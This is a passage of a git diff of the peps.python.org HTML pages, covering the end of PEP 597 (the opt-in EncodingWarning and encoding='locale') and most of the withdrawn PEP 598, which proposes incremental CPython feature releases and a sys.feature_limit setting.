Add a new EncodingWarning warning class as a subclass of +Warning. It is emitted when the encoding argument is omitted and +the default locale-specific encoding is used.

+
+
+

Options to enable the warning

+

The -X warn_default_encoding option and the +PYTHONWARNDEFAULTENCODING environment variable are added. They +are used to enable EncodingWarning.

+

sys.flags.warn_default_encoding is also added. The flag is true when +EncodingWarning is enabled.

+

When the flag is set, io.TextIOWrapper(), open() and other +modules using them will emit EncodingWarning when the encoding +argument is omitted.

+

Since EncodingWarning is a subclass of Warning, they are +shown by default (if the warn_default_encoding flag is set), unlike +DeprecationWarning.

+
+
+

encoding="locale"

+

io.TextIOWrapper will accept "locale" as a valid argument to +encoding. It has the same meaning as the current encoding=None, +except that io.TextIOWrapper doesn’t emit EncodingWarning when +encoding="locale" is specified.

+
+
+

io.text_encoding()

+

io.text_encoding() is a helper for functions with an +encoding=None parameter that pass it to io.TextIOWrapper() or +open().

+

A pure Python implementation will look like this:

+
def text_encoding(encoding, stacklevel=1):
+    """A helper function to choose the text encoding.
+
+    When *encoding* is not None, just return it.
+    Otherwise, return the default text encoding (i.e. "locale").
+
+    This function emits an EncodingWarning if *encoding* is None and
+    sys.flags.warn_default_encoding is true.
+
+    This function can be used in APIs with an encoding=None parameter
+    that pass it to TextIOWrapper or open.
+    However, please consider using encoding="utf-8" for new APIs.
+    """
+    if encoding is None:
+        if sys.flags.warn_default_encoding:
+            import warnings
+            warnings.warn(
+                "'encoding' argument not specified.",
+                EncodingWarning, stacklevel + 2)
+        encoding = "locale"
+    return encoding
+
+
+

For example, pathlib.Path.read_text() can use it like this:

+
def read_text(self, encoding=None, errors=None):
+    encoding = io.text_encoding(encoding)
+    with self.open(mode='r', encoding=encoding, errors=errors) as f:
+        return f.read()
+
+
+

By using io.text_encoding(), EncodingWarning is emitted for +the caller of read_text() instead of read_text() itself.

+
+
+

Affected standard library modules

+

Many standard library modules will be affected by this change.

+

Most APIs accepting encoding=None will use io.text_encoding() +as written in the previous section.

+

Where using the locale encoding as the default encoding is reasonable, +encoding="locale" will be used instead. For example, +the subprocess module will use the locale encoding as the default +for pipes.

+

Many tests use open() without encoding specified to read +ASCII text files. They should be rewritten with encoding="ascii".

+
+
+
+

Rationale

+
+

Opt-in warning

+

Although DeprecationWarning is suppressed by default, always +emitting DeprecationWarning when the encoding argument is +omitted would be too noisy.

+

Noisy warnings may lead developers to dismiss the +DeprecationWarning.

+
+
+

“locale” is not a codec alias

+

We don’t add “locale” as a codec alias because the locale can be +changed at runtime.

+

Additionally, TextIOWrapper checks os.device_encoding() +when encoding=None. This behavior cannot be implemented in +a codec.

+
+
+
+

Backward Compatibility

+

The new warning is not emitted by default, so this PEP is 100% +backwards-compatible.

+
+
+

Forward Compatibility

+

Passing "locale" as the argument to encoding is not +forward-compatible. Code using it will not work on Python older than +3.10, and will instead raise LookupError: unknown encoding: locale.

+

Until developers can drop Python 3.9 support, EncodingWarning +can only be used for finding missing encoding="utf-8" arguments.

+
+
+

How to Teach This

+
+

For new users

+

Since EncodingWarning is used to write cross-platform code, +there is no need to teach it to new users.

+

We can just recommend using UTF-8 for text files and using +encoding="utf-8" when opening them.

+
+
+

For experienced users

+

Using open(filename) to read text files encoded in UTF-8 is a +common mistake. It may not work on Windows because UTF-8 is not the +default encoding.

+

You can use -X warn_default_encoding or +PYTHONWARNDEFAULTENCODING=1 to find this type of mistake.

+

Omitting the encoding argument is not a bug when opening text files +encoded in the locale encoding, but encoding="locale" is recommended +in Python 3.10 and later because it is more explicit.

+
+
+
+

Reference Implementation

+

https://github.com/python/cpython/pull/19481

+
+
+

Discussions

+

The latest discussion thread is: +https://mail.python.org/archives/list/python-dev@python.org/thread/SFYUP2TWD5JZ5KDLVSTZ44GWKVY4YNCV/

+
    +
  • Why not implement this in linters?
      +
    • encoding="locale" and io.text_encoding() must be implemented +in Python.
    • +
    • It is difficult to find all callers of functions wrapping +open() or TextIOWrapper() (see the io.text_encoding() +section).
    • +
    +
  • +
  • Many developers will not use the option.
      +
    • Some will, and report the warnings to libraries they use, +so the option is worth it even if many developers don’t enable it.
    • +
    • For example, I found [7] and [8] by running +pip install -U pip, and [9] by running tox +with the reference implementation. This demonstrates how this +option can be used to find potential issues.
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0597.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0598/index.html b/pep-0598/index.html new file mode 100644 index 00000000000..8f574a5f512 --- /dev/null +++ b/pep-0598/index.html @@ -0,0 +1,967 @@ + + + + + + + + PEP 598 – Introducing incremental feature releases | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 598 – Introducing incremental feature releases

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
15-Jun-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 602 proposes reducing the feature delivery latency for the Python +standard library and CPython reference interpreter by increasing the frequency +of CPython feature releases from every 18-24 months to instead occur every 9-12 +months.

+

This PEP proposes to instead reduce the frequency of new baseline feature +releases (with the associated filesystem layout changes, bytecode format +changes, and C ABI compatibility breaks) to occur only every other year (2020, +2022, 2024, etc), but to combine that change with a new policy and approach that +allows the introduction of backwards compatible features in the initial set of +point releases within a given release series.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn in favour of the rolling beta release stream +proposal in PEP 605.

+

However, the concerns raised in this PEP are likely to apply to any other +“Long Term Support branch” proposals that allow feature backports to improve +the developer experience of supporting such releases (such as the EL Python +draft at [3]), so the ideas presented here may provide useful design +suggestions for such proposals.

+
+
+

Summary

+

The proposal to keep the current CPython release compatibility management +process, but go through it more often has significant practical downsides, +as a CPython feature release carries certain expectations (most notably, a 5-year +maintenance lifecycle, support for parallel installation with the previous +feature release, and the possibility of breaking changes to the CPython-specific +ABI, requiring recompilation of all extension modules) that mean faster feature +releases in their current form have the potential to significantly increase the +burden of maintaining 3rd party Python libraries and applications across all +actively supported CPython releases.

+

It’s also arguable whether such an approach would noticeably reduce the typical +feature delivery latency in practice for most end users, as the adoption cycle +for new feature releases is typically measured in months or years, so more +frequent releases may just lead to end users updating to every 3rd or 4th +feature release, rather than every 2nd or 3rd feature release (as often happens +today).

+

This PEP presents a competing proposal to instead slow down the frequency of +parallel installable feature releases that change the filesystem layout +and CPython ABI to a consistent 24-month cycle, but to compensate for this by +introducing the notion of build compatible incremental feature releases, and +then deferring the full feature freeze of a given feature release series from +the initial baseline X.Y.0 release to a subsequent X.Y.Z feature complete +release that occurs ~12 months after the initial baseline feature release.

+

A new feature_complete attribute on the sys.version_info structure will +provide a programmatic indicator as to whether or not a release series remains +open to further incremental feature releases. Alternate implementations of +Python would also be free to clear this flag to indicate that their support for +their nominal Python version may still be a work in progress.

+

For compatibility testing purposes, and to maintain pickle compatibility in +mixed version environments, a new sys.feature_limit attribute (and +corresponding CPython CLI parameter, --feature-limit X.Y.Z, and environment +variable, PYTHONFEATURELIMIT) will provide a way to limit the runtime +availability of features added in incremental feature releases.

+

The existing cycle and the new cycle would be synchronised on their feature +freeze release dates, so the full Python 3.9.x feature freeze would occur in +October 2021, 24 months after the Python 3.8.0 feature release, with the initial +Python 3.9.0 release taking place in October 2020.

+
+
+

Example Future Release Schedules

+

Under this proposal, Python 3.9.0a1 would be released in November 2019, shortly +after the Python 3.8.0 feature complete release in October 2019.

+

The 3.9.0b1 release would then follow 6 months later in May 2020, with 3.9.0 +itself being released in October 2020.

+

Assuming micro releases of 3.9.x were to occur quarterly, then the overall +release timeline would look like:

+
    +
  • 2019-11: 3.9.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2020-05: 3.9.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2020-08: 3.9.0bX (final beta release that locks ABI compatibility)
  • +
  • 2020-09: 3.9.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2020-10: 3.9.0 (BFR - baseline feature release)
  • +
  • 2021-01: 3.9.1 (IFR - incremental feature release)
  • +
  • 2021-04: 3.9.2 (IFR)
  • +
  • 2021-07: 3.9.3 (IFR)
  • +
  • 2021-10: 3.9.4 (feature complete release)
  • +
  • 2022-01: 3.9.5
  • +
  • 2022-04: 3.9.6
  • +
  • 2022-07: 3.9.7
  • +
  • 2022-10: 3.9.8 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2025-10: 3.9.x branch closed
  • +
+

Feature complete release numbers would typically be written without any +qualifier (as they are today), while the baseline and incremental feature +releases would be expected to have a qualifier appended indicating that they +aren’t a traditional CPython release (3.9.0 (BFR), 3.9.1 (IFR), etc).

+

The Python 3.10 release series would start being published the month after the +first Python 3.9 feature complete release, in parallel with the final 12 months +of routine Python 3.9 maintenance releases:

+
    +
  • 2021-11: 3.10.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2022-05: 3.10.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2022-08: 3.10.0bX (final beta release that locks ABI compatibility)
  • +
  • 2022-09: 3.10.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2022-10: 3.10.0 (BFR)
  • +
  • 2023-01: 3.10.1 (IFR)
  • +
  • 2023-04: 3.10.2 (IFR)
  • +
  • 2023-07: 3.10.3 (IFR)
  • +
  • 2023-10: 3.10.4
  • +
  • 2024-01: 3.10.5
  • +
  • 2024-04: 3.10.6
  • +
  • 2024-07: 3.10.7
  • +
  • 2024-10: 3.10.8 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2027-10: 3.10.x branch closed
  • +
+

In this model, there are always two or three active branches:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-05: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-05 -> 2020-10: 3.10.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-10 -> 2021-10: 3.10.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-05: 3.10.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-05 -> 2022-10: 3.11.0 pre-alpha, 3.10.0 pre-release, 3.9.x maintenance
  • +
  • 2022-10 -> 2023-10: 3.11.0 pre-alpha, 3.10.x feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-05: 3.11.0 pre-beta, 3.10.x maintenance
  • +
  • 2024-05 -> 2024-10: 3.12.0 pre-alpha, 3.11.0 pre-release, 3.10.x maintenance
  • +
  • … etc
  • +
+

(Pre-alpha and pre-beta development occurs on the main git branch, all other +development occurs on a release specific branch with changes typically +backported from the main git branch)

+

TODO: this really needs a diagram to help explain it, so I’ll add a picture +once I have one to add.

+

This is quite similar to the status quo, but with a more consistent cadence, +alternating between baseline feature release years (2020, 2022, etc) that focus +on the alpha and beta cycle for a new baseline feature release (while continuing +to publish maintenance releases for the previous feature release series), and +feature complete release years (2021, 2023, etc), that focus on making +smaller improvements to the current feature release series (while making plans +for the next feature release series the following year).

+
+
+

Proposal

+

Excluding alpha and beta releases, CPython currently has 3 different kinds +of release increment:

+
    +
  • Feature release (i.e. X.Y.0 releases)
  • +
  • Maintenance release (X.Y.Z releases within ~2 years of X.Y.0)
  • +
  • Source-only security release (subsequent X.Y.Z releases)
  • +
+

Feature freeze takes place at the time of the X.Y.0b1 release. +Build compatibility freeze now takes place at the time of the last beta release +(providing time for projects to upload wheel archives to PyPI prior to the +first release candidate).

+

This then creates the following periods in the lifecycle of a release series:

+
    +
  • Pre-beta (release series is the CPython development branch)
  • +
  • Beta (release enters maintenance mode, ABI compatibility mostly locked)
  • +
  • Maintenance (ABI locked, only bug fixes & docs enhancements accepted)
  • +
  • Security fix only (no further binary releases, only security fixes accepted)
  • +
  • End of life (no further releases of any kind)
  • +
+

The proposal in this PEP is that the “Feature release” category be split up into +three different kinds of feature release:

+
    +
  • Baseline feature release (X.Y.0 releases)
  • +
  • Incremental feature release (any X.Y.Z releases published between a +baseline feature release and the corresponding feature complete release)
  • +
  • Feature complete release (a specific X.Y.Z release ~1 year after X.Y.0)
  • +
  • Maintenance release (X.Y.Z releases within ~1 years of the feature complete release)
  • +
  • Source-only security release (subsequent X.Y.Z releases)
  • +
+

This would then introduce a new “Feature releases” phase in the release series +lifecycle:

+
    +
  • Pre-beta (release series is the CPython development branch)
  • +
  • Beta (release enters feature additions mode, ABI compatibility not yet locked)
  • +
  • Feature releases (ABI locked, backwards compatible API additions accepted)
  • +
  • Maintenance (ABI locked, only bug fixes & docs enhancements accepted)
  • +
  • Security fix only (no further binary releases, only security fixes accepted)
  • +
  • End of life (no further releases of any kind)
  • +
+

The pre-release beta period would be relaxed to use the incremental feature +release policy for changes, rather than the stricter maintenance release policy.

+

For governance purposes, baseline feature releases are the only releases that +would qualify as a “feature release” in the PEP 13 sense (incremental feature +releases wouldn’t count).

+
+

Baseline feature releases and feature release series

+

Baseline feature releases are essentially just the existing feature releases, +given a new name to help distinguish them from the new incremental feature +releases, and also to help indicate that unlike their predecessors, they are +no longer considered feature complete at release.

+

Baseline feature releases would continue to define a new feature release series, +locking in the following language, build, and installation compatibility +constraints for the remainder of that series:

+
    +
  • Python language grammar
  • +
  • ast module AST format
  • +
  • CPython interpreter opcode format
  • +
  • pyc file magic number and filename compatibility tags
  • +
  • extension module filename compatibility tags
  • +
  • wheel archive compatibility tags
  • +
  • default package and module import directories
  • +
  • default installation filename and directories
  • +
+

Baseline feature releases would also continue to be the only releases where:

+
    +
  • new deprecations, pending deprecations, and other warnings can be introduced
  • +
  • existing pending deprecations can be converted to full deprecations
  • +
  • existing warnings can be converted to errors
  • +
  • other changes requiring “Porting to Python X.Y” entries in the What’s New +document can be introduced
  • +
+

Key characteristics of a feature release series:

+
    +
  • an installation within one feature release series does not conflict with +installations of other feature release series (i.e. they can be installed in parallel)
  • +
  • an installation within a feature release series can be updated to a later +micro release within the same series without requiring reinstallation +or any other changes to previously installed components
  • +
+

Key characteristics of a baseline feature release:

+
    +
  • in a baseline feature release, sys.version_info.feature_complete == False
  • +
  • in a baseline feature release, sys.version_info.micro == 0
  • +
  • baseline feature releases may contain higher risk changes to the language and +interpreter, such as grammar modifications, major refactoring of interpreter +and standard library internals, or potentially invasive feature additions that +carry a risk of unintended side effects on other existing functionality
  • +
  • features introduced in a baseline feature release are the only features +permitted to rely on sys.version_info as their sole runtime indicator +of the feature’s availability
  • +
+

Key expectations around feature release series and baseline feature releases:

+
    +
  • most public projects will only actively test against the most recent +micro release within a release series
  • +
  • many (most?) public projects will only add a new release series to their test +matrix after the initial baseline feature release has already been published, +which can make it difficult to resolve issues that require providing new flags +or APIs to explicitly opt-in to old behaviour after a default behaviour changed
  • +
  • private projects with known target environments will test against whichever +micro release version they’re actually using
  • +
  • most private projects will also only consider migrating to a new release +series after the initial baseline feature release has already been published, +again posing a problem if the resolution of their problems requires an API +addition
  • +
+

The key motivation of the proposal in this PEP is that the public and private +project behaviours described above aren’t new expectations: they’re +descriptions of the way CPython release series are already handled by the wider +community today. As such, the PEP represents an attempt to adjust our release +policies and processes to better match the way the wider community already +handles them, rather than changing our processes in a way that then means the +wider community needs to adjust to us rather than the other way around.

+
+
+

Incremental feature releases

+

Incremental feature releases are the key new process addition being proposed by +this PEP. They are subject to the same strict runtime compatibility requirements +as the existing maintenance releases, but would have the following more +relaxed policies around API additions and enhancements:

+
    +
  • new public APIs can be added to any standard library module (including builtins)
  • +
  • subject to the feature detection requirement below, new optional arguments can +be added to existing APIs (including builtins)
  • +
  • new public APIs can be added to the stable C ABI (with appropriate version guards)
  • +
  • new public APIs can be added to the CPython C API
  • +
  • with the approval of the release manager, backwards compatible reliability +improvements can be made to existing APIs and syntactic constructs
  • +
  • with the approval of the release manager, performance improvements can be +incorporated for existing APIs and syntactic constructs
  • +
+

The intent of this change in policy is to allow usability improvements for new +(and existing!) language features to be delivered in a more timely fashion, +rather than requiring users to incur the inherent delay and costs of waiting for +and then upgrading to the next feature release series.

+

It is also designed such that the approval to add a feature to the next baseline +feature release can be considered separately from the question of whether or not +to make it available in the next incremental feature release for the current +release series, potentially allowing the first task to be completed by volunteer +contributors, while the latter activity could be handled by paid contributors +(e.g. customers of commercial Python redistributors could potentially request +that their vendor backport a feature, or core developers could offer to +undertake specific backports on a contract basis). (There would be potential +ethical concerns with gating bug fixes this way, but those concerns don’t apply +for backports of new features)

+

Key characteristics of an incremental feature release:

+
    +
  • in an incremental feature release, sys.version_info.feature_complete == False
  • +
  • in an incremental feature release, sys.version_info.micro != 0
  • +
  • all API additions made in an incremental feature release must support +efficient runtime feature detection that doesn’t rely on either +sys.version_info or runtime code object introspection. In most cases, a +simple hasattr check on the affected module will serve this purpose, but +when it doesn’t, an alternative approach will need to be implemented as part +of the feature addition. Prior art in this area includes the +pickle.HIGHEST_PROTOCOL attribute, the hashlib.algorithms_available +set, and the various os.supports_* sets that the os module already +offers for platform dependent capability detection
  • +
  • to maintain pickle compatibility in mixed version environments, and to enable +easier compatibility testing across multiple API versions within the same +release series, all API additions made in an incremental feature release +must support the new sys.feature_limit setting as described in the next +section
  • +
+

Key expectations around incremental feature releases:

+
    +
  • “don’t break existing installations on upgrade” remains a key requirement +for all micro releases, even with the more permissive change inclusion policy
  • +
  • more intrusive changes should still be deferred to the next baseline feature +release
  • +
  • public Python projects that start relying on features added in an incremental +feature release should set their Python-Requires metadata appropriately +(projects already do this when necessary - e.g. aiohttp specifically +requires 3.5.3 or later due to an issue with asyncio.get_event_loop() +in earlier versions)
  • +
+

Some standard library modules may also impose their own restrictions on +acceptable changes in incremental feature releases (for example, only a +baseline feature release should ever add new hash algorithms to +hashlib.algorithms_guaranteed - incremental feature releases would only be +permitted to add algorithms to hashlib.algorithms_available)

+
+
+

Maintaining interoperability across incremental feature releases

+

It is a common practice to use Python’s pickle module to exchange +information between Python processes running on different versions of Python. +Between release series, this compatibility is expected to only run one way +(i.e. excluding deprecated APIs, Python “X.Y+1” processes should be able to +read pickle archives produced by Python “X.Y” processes, but the reverse does +not hold, as the newer archives may reference attributes and parameters that +don’t exist in the older version).

+

Within a release series, however, it is expected to hold in both directions, +as the “No new features” policy means that almost all pickle archives created +on Python “X.Y.Z+1” will be readable by Python “X.Y.Z” processes.

+

Similarly, Python libraries and applications are often only tested against +the latest version in a release series, and this is usually sufficient to keep +code working on earlier releases in that same series.

+

Allowing feature additions in later “X.Y.Z” releases with no way to turn them +off would pose a problem for these common practices, as a library or application +that works fine when tested on CPython version “X.Y.Z” would fail on earlier +versions if it used a feature newly introduced in “X.Y.Z”, and any pickle +archives it creates that rely on those new interfaces may also not be readable +on the older versions.

+

To help address these problems, a new sys.feature_limit attribute would be +added, as a structured sequence corresponding to the first 3 fields in +sys.version_info (major, minor, micro).

+

A new CLI option (--feature-limit X.Y.Z) and environment variable +(PYTHONFEATURELIMIT=X.Y.Z) would be used to set this attribute. The +PyCoreConfig struct would also gain a new field:

+
wchar_t *feature_limit;
+
+
+

If the limit is not set explicitly, it would default to the first 3 fields in +sys.version_info. If the limit is set to a value outside the lower bound of +sys.version_info[:2] and the upper bound of sys.version_info[:3], it +will be clamped to those bounds, padding with zeroes if necessary.

+

For example, given a current version of “3.9.3”, nominal limits would be +converted to runtime sys.feature_limit values as follows:

+
3 => (3, 9, 0)
+3.8.1 => (3, 9, 0)
+3.9 => (3, 9, 0)
+3.9.2 => (3, 9, 2)
+<unset> => (3, 9, 3)
+3.9.3 => (3, 9, 3)
+3.9.4 => (3, 9, 3)
+4 => (3, 9, 3)
+
+
+

New APIs backported to an incremental feature release would be expected to +include a guard that deletes the API from the module if the feature limit is +too low:

+
def feature_api():
+    ...
+
+_version_feature_api_added = (3, 9, 1)
+if _version_feature_api_added > sys.feature_limit:
+    del feature_api
+
+
+

Similarly, new parameters would be expected to include a guard that adjusts the +function signature to match the old one:

+
def feature_api(old_param1, old_param2, new_param=default):
+    """Updated API docstring"""
+    ...
+
+_version_feature_api_changed = (3, 9, 1)
+if _version_feature_api_changed > sys.feature_limit:
+    _new_feature_api = feature_api
+    def feature_api(old_param1, old_param2):
+        """Legacy API docstring"""
+        return _new_feature_api(old_param1, old_param2)
+
+
+

Structuring the guards this way would keep the code structure as similar as +possible between the main development branch and the backport branches, so +future bug fixes can still be backported automatically.

+

It is expected that convenience functions and/or additional automated tests +would eventually be added to help ensure these backported APIs are guarded +appropriately, but it seems reasonable to wait until specific concrete +examples are available to drive the design of those APIs and automated tests, +rather than designing them solely on the basis of hypothetical examples.

+
+
+

Feature complete release and subsequent maintenance releases

+

The feature complete release for a given feature release series would be +developed under the normal policy for an incremental feature release, but +would have one distinguishing feature:

+
    +
  • in a feature complete release, sys.version_info.feature_complete == True
  • +
+

Any subsequent maintenance and security fix only releases would also have that +flag set, and may informally be referred to as “feature complete releases”. +For release series definition purposes though, the feature complete release +is the first one that sets that flag to “True”.

+
+
+

Proposed policy adjustment for provisional APIs

+

To help improve consistency in management of provisional APIs, this PEP proposes +that provisional APIs be subject to regular backwards compatibility requirements +following the feature complete release for a given release series.

+

Other aspects of managing provisional APIs would remain as they are today, so as +long as an API remains in the provisional state, regular backwards compatibility +requirements would not apply to that API in baseline and incremental feature +releases.

+

This policy is expected to provide increased clarity to end users (as even +provisional APIs will become stable for that release series in the feature +complete release), with minimal practical downsides for standard library +maintainers, based on the following analysis of documented API additions and +changes in micro releases of CPython since 3.0.0:

+
    +
  • 21 3.x.1 version added/changed notes
  • +
  • 30 3.x.2 version added/changed notes
  • +
  • 18 3.x.3 version added/changed notes
  • +
  • 11 3.x.4 version added/changed notes
  • +
  • 1 3.x.5 version added/changed notes
  • +
  • 0 3.x.6+ version added/changed notes
  • +
+

When post-baseline-release changes need to be made, the majority of them occur +within the first two maintenance releases, which have always occurred within 12 +months of the baseline release.

+

(Note: these counts are not solely for provisional APIs - they cover all APIs +where semantic changes were made after the baseline release that were considered +necessary to cover in the documentation. To avoid double counting changes, the +numbers exclude any change markers from the What’s New section)

+
+
+
+

Motivation

+

The motivation for change in this PEP is essentially the same as the motivation +for change in PEP 596: the current 18-24 month gap between feature releases has +a lot of undesirable consequences, especially for the standard library (see +PEP 596 for further articulation of the details).

+

This PEP’s concern with the specific proposal in PEP 596 is that it doubles the +number of actively supported Python branches, increasing the complexity of +compatibility testing matrices for the entire Python community, increasing the +number of binary Python wheels to be uploaded to PyPI when not using the stable +ABI, and just generally having a high chance of inflicting a relatively high +level of additional cost across the entire Python ecosystem.

+

The view taken in this PEP is that there’s an alternative approach that provides +most of the benefits of a faster feature release without actually incurring the +associated costs: we can split the current X.Y.0 “feature freeze” into two +parts, such that the baseline X.Y.0 release only imposes a +“runtime compatibility freeze”, and the full standard library feature freeze +is deferred until later in the release series lifecycle.

+
+
+

Caveats and Limitations

+

This proposal does NOT retroactively apply to Python 3.8 - it is being proposed +for Python 3.9 and later releases only.

+

Actual release dates may be adjusted up to a month earlier or later at +the discretion of the release manager, based on release team availability, and +the timing of other events (e.g. PyCon US, or the annual core development +sprints). However, part of the goal of this proposal is to provide a consistent +annual cadence for both contributors and end users, so adjustments ideally would +be rare.

+

This PEP does not dictate a specific cadence for micro releases within a release +series - it just specifies the rough timelines for transitions between the +release series lifecycle phases (pre-alpha, alpha, beta, feature releases, +bug fixes, security fixes). The number of micro releases within each phase is +determined by the release manager for that series based on how frequently they +and the rest of the release team for that series are prepared to undertake the +associated work.

+

However, for the sake of the example timelines, the PEP assumes quarterly +micro releases (the cadence used for Python 3.6 and 3.7, splitting the +difference between the twice yearly cadence used for some historical release +series, and the monthly cadence planned for Python 3.8 and 3.9).

+
+
+

Design Discussion

+
+

Why this proposal over simply doing more frequent baseline feature releases?

+

The filesystem layout changes and other inherently incompatible changes involved +in a baseline feature release create additional work for large sections of the +wider Python community.

+

Decoupling those layout changes from the Python version numbering scheme is also +something that would in and of itself involve making backwards incompatible +changes, as well as adjusting community expectations around which versions will +install over the top of each other, and which can be installed in parallel on +a single system.

+

We also don’t have a straightforward means to communicate to the community +variations in support periods like “Only support Python version X.Y until +X.Y+1 is out, but support X.Z until X.Z+2 is out”.

+

So this PEP takes as its starting assumption that the vast majority of Python +users simply shouldn’t need to care that we’re changing our release policy, +and the only folks that should be affected are those that are eagerly waiting +for standard library improvements (and other backwards compatible interpreter +enhancements), and those that need to manage mission critical applications in +complex deployment environments.

+
+
+

Implications for Python library development

+

Many Python libraries (both open source and proprietary) currently adopt the +practice of testing solely against the latest micro release within each feature +release series that the project still supports.

+

The design assumption in this PEP is that this practice will continue to be +followed during the feature release phase of a release series, with the +expectation being that anyone choosing to adopt a new release series before it +is feature complete will closely track the incremental feature releases.

+

Libraries that support a previous feature release series are unlikely to adopt +features added in an incremental feature release, and if they do adopt such +a feature, then any associated fallback compatibility strategies should be +implemented in such a way that they’re also effective on the earlier releases +in that release series.

+
+
+

Implications for the proposed Scientific Python ecosystem support period

+

Based on discussions at SciPy 2019, a NEP is currently being drafted [2] to +define a common convention across the Scientific Python ecosystem for dropping +support for older Python versions.

+

While the exact formulation of that policy is still being discussed, the initial +proposal was very simple: support any Python feature release published within +the last 42 months.

+

For an 18-month feature release cadence, that works out to always supporting at +least the two most recent feature releases, and then dropping support for all +X.Y.z releases around 6 months after X.(Y+2).0 is released. This means there is +a 6-month period roughly every other year where the three most recent feature +releases are supported.

+

For a 12-month release cadence, it would work out to always supporting at +least the three most recent feature releases, and then dropping support for all +X.Y.z releases around 6 months after X.(Y+3).0 is released. This means that +for half of each year, the four most recent feature releases would be supported.

+

For a 24-month release cadence, a 42-month support cycle works out to always +supporting at least the most recent feature release, and then dropping support +for all X.Y.z feature releases around 18 months after X.(Y+1).0 is released. +This means there is a 6-month period every other year where only one feature +release is supported (and that period overlaps with the pre-release testing +period for the X.(Y+2).0 baseline feature release).

+

Importantly for the proposal in this PEP, that support period would abide by +the recommendation that library developers maintain support for the previous +release series until the latest release series has attained feature complete +status: dropping support 18 months after the baseline feature release will be +roughly equivalent to dropping support 6 months after the feature complete +release, without needing to track exactly which release marked the series as +feature complete.

+
+
+

Implications for simple deployment environments

+

For the purposes of this PEP, a “simple” deployment environment is any use case +where it is straightforward to ensure that all target environments are updated +to a new Python micro version at the same time (or at least in advance of the +rollout of new higher level application versions), and there isn’t any +requirement for older Python versions to be able to reliably read pickle streams +generated with the newer Python version, such that any pre-release testing that +occurs need only target a single Python micro version.

+

The simplest such case would be scripting for personal use, where the testing +and target environments are the exact same environment.

+

Similarly simple environments would be containerised web services, where the +same Python container is used in the CI pipeline as is used on deployment, and +any application that bundles its own Python runtime, rather than relying on a +pre-existing Python deployment on the target system.

+

For these use cases, this PEP shouldn’t have any significant implications - only +a single micro version needs to be tested, independently of whether that +version is feature complete or not.

+
+
+

Implications for complex deployment environments

+

For the purposes of this PEP, “complex” deployment environments are use cases +which don’t meet the “simple deployment” criterion above: new application +versions are combined with two or more distinct micro versions within +the same release series as part of the deployment process, rather than always +targeting exactly one micro version at a time.

+

If the proposal in this PEP has the desired effect of reducing feature delivery +latency, then it can be expected that developers using a release series that is +not yet feature complete will actually make use of the new features as they’re +made available. This then means that testing against a newer incremental feature +release becomes an even less valid test of compatibility with the baseline +feature release and older incremental feature releases than testing against a +newer maintenance release is for older maintenance releases.

+

One option for handling such cases is to simply prohibit the use of new Python +versions until the series has reached “feature complete” status. Such a policy +is effectively already adopted by many organisations when it comes to new +feature release series, with acceptance into operational environments occurring +months or years after the original release. If this policy is adopted, then such +organisations could potentially still adopt a new Python version every other +year - it would just be based on the availability of the feature complete +releases, rather than the baseline feature releases.

+

A less strict alternative to outright prohibition would be to make use of the +proposed PYTHONFEATURELIMIT setting to enable phased migrations to new +incremental feature releases:

+
    +
  • initially roll out Python X.Y.0 with PYTHONFEATURELIMIT=X.Y.0 set in CI +and on deployment
  • +
  • roll out Python X.Y.1 to CI, keeping the PYTHONFEATURELIMIT=X.Y.0 setting
  • +
  • deploy Python X.Y.1 to production based on successful CI results
  • +
  • update deployment environments to set PYTHONFEATURELIMIT=X.Y.1
  • +
  • set PYTHONFEATURELIMIT=X.Y.1 in CI only after all deployment environments +have been updated
  • +
  • repeat this process for each new release up to and including the feature +complete release for the release series
  • +
  • once the series is feature complete, either continue with this same process +for consistency’s sake, or else stop updating PYTHONFEATURELIMIT and leave +it at the feature complete version number
  • +
+
+
+

Duration of the feature additions period

+

This PEP proposes that feature additions be limited to 12 months after the +initial baseline feature release.

+

The primary motivation for that is specifically to sync up with the Ubuntu LTS +timing, such that the feature complete release for the Python 3.9.x series gets +published in October 2021, ready for inclusion in the Ubuntu 22.04 release. +(other LTS Linux distributions like RHEL, SLES, and Debian don’t have a fixed +publishing cadence, so they can more easily tweak their LTS timing a bit to +align with stable versions of their inputs. Canonical deliberately haven’t +given themselves that flexibility with their own release cycle).

+

The 12 month feature addition period then arises from splitting the time +from the 2019-10 release of Python 3.8.0 and a final Python 3.9.x incremental +feature release in 2021-10 evenly between pre-release development and subsequent +incremental feature releases.

+

This is an area where this PEP could adopt part of the proposal in PEP 596, +by instead making that split ~9 months of pre-release development, and ~15 +months of incremental feature releases:

+
    +
  • 2019-11: 3.9.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2020-03: 3.9.0b1
  • +
  • 2020-04: 3.9.0b2
  • +
  • 2020-05: 3.9.0b3 (final beta release that locks ABI compatibility)
  • +
